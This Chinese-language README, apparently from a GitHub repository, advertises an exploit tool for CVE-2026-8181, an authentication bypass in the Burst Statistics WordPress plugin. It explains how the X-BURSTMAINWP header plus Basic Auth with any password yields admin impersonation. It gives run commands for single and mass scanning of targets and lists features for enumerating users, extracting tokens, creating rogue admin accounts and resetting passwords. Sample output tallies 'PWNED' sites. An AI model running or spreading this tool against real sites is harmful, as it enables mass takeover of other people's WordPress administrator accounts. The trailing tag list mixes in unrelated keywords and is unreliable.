xShadow-Here/CVE-2026-8181

# CVE-2026-8181 漏洞 Burst Statistics | 认证绕过导致管理员账户接管 ### 漏洞描述： Burst Statistics 3.4.0 - 3.4.1.1 版本 - 认证绕过导致管理员账户接管 WordPress 的 Burst Statistics – 隐私友好型 WordPress 分析（Google Analytics 替代方案）插件在 3.4.0 至 3.4.1.1 版本中存在认证绕过漏洞。这是由于在 `is_mainwp_authenticated()` 函数中处理来自 Authorization 头的应用密码时，返回值处理不当所致。该函数调用 `wp_authenticate_application_password(null, $username, $password)`，当目标用户未配置应用密码时，此函数返回 `null`（而非 `WP_Error`）。由于代码仅检查 `is_wp_error()`，因此会继续调用 `wp_set_current_user()` —— 这会在整个请求期间授予攻击者完全的管理员权限。 该绕过触发于 `plugins_loaded`（优先级 9）期间，通过插件引导中的 `has_admin_access()` 实现，这意味着用户身份冒充发生在 **WordPress REST API 调度任何路由之前** —— 从而可以作为管理员访问所有 WP 核心端点（`/wp/v2/users`、`/wp/v2/users/me` 等）。 这使得未经认证的攻击者，只要知道管理员用户名，便可通过提供任意随机的 Basic Authentication 密码来冒充该管理员，实现完全的权限提升和管理员账户接管。 # 信息：[**CVE-2026-8181**](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/burst-statistics/burst-statistics-340-3411-authentication-bypass-to-admin-account-takeover) ~ **CVSS 评分：9.8（严重）** ~ **CVSS 向量：CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H** ~ **受影响版本：3.4.0 - 3.4.1.1** ~ **修复版本：3.4.2** - 研究员：[**Chloe Chamberland - Wordfence**](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chloe-chamberland) ### 用法： **单个目标：** - `python3 shadow.py -u https://target.com` **已知用户名的单个目标：** - `python3 shadow.py -u https://target.com -U admin` **批量目标：** - `python3 shadow.py -f targets.txt -t 20` **交互模式：** - `python3 shadow.py` - 输入目标文件名 - 输入线程数（最大 1-50） - 输入超时时间（5-30秒） ### 功能： - 多线程（批量扫描最高支持 50 线程） - 通过 X-BURSTMAINWP 头 + Basic Auth 实现认证绕过 - 自动检测 WordPress - Burst Statistics 版本检测与漏洞版本检查 - 路由存活检查（`/burst/v1/mainwp-auth`） - 用户枚举（REST API + 作者归档 + oEmbed 回退） - 应用密码令牌提取 - 通过 WP REST API 创建管理员用户 - 管理员密码重置（回退） - 通过 wp-login.php 验证接管 - 自动 HTTP/HTTPS 回退与重试 - 三重输出（user.txt, token.txt, new-user-and-header.txt） ### 输出： ``` ╔══════════════════════════════════════════════════════╗ ║ 🔥 CVE-2026-8181 Burst Statistics Auth Bypass ║ ║ 👩‍💻 Friska & Shadow | Route Check | Full Fallback ║ ║ 🎯 3.4.0-3.4.1.1 | CVSS 9.8 | Triple Output ║ ╚══════════════════════════════════════════════════════╝ [*] [HTTP] http://target.com [+] Burst Statistics version: 3.4.0 [+] Burst mainwp-auth route alive! [*] Testing 2 user(s): admin, editor [*] Trying bypass on: admin (id=1) [+] BYPASS SUCCESS → admin (id=1, admin=True) [+] Application Password token extracted! [💀] USER CREATED: shadow / R4nd0mP@ss! [💀] TAKEOVER VERIFIED via wp-login.php! [💀] SUCCESS! http://target.com/wp-admin/ ``` ``` ⚡ MASS SCAN: 50 targets | 20 threads ──────────────────────────────────────────────────────────── [💀] [1/50] http://target1.com → PWNED! [💀] [2/50] http://target2.com → PWNED! [☠️] [3/50] http://target3.com → DEAD [-] [4/50] http://target4.com → SECURED [!] [5/50] http://target5.com → PATCHED ──────────────────────────────────────────────────────────── ╔══════════════════════════════════╗ ║ 📊 SCAN SUMMARY ║ ╠══════════════════════════════════╣ ║ 💀 PWNED: 12 ║ ║ ☠️ DEAD: 8 ║ ║ 🔒 SECURED: 5 ║ ║ ⚠️ PATCHED: 15 ║ ║ ❌ FAILED: 10 ║ ╠══════════════════════════════════╣ ║ Total: 50 ║ ╚══════════════════════════════════╝ [+] 📁 user.txt | token.txt | new-user-and-header.txt ``` ## 免责声明： ## 本工具仅用于教育和安全测试目的。 未经授权使用您不拥有或未获得测试许可的系统是非法的。

标签：Burst Statistics, CISA项目, CVE-2026-8181, CVSS 9.8, PHP开发, REST API, Web报告查看器, WordPress安全, 协议分析, 基本认证, 威胁模拟, 安全更新, 应用密码, 插件漏洞, 操作系统监控, 无服务器架构, 权限提升, 漏洞分析, 用户模拟, 管理员账户接管, 网络安全, 认证绕过, 路径探测, 逆向工具, 隐私保护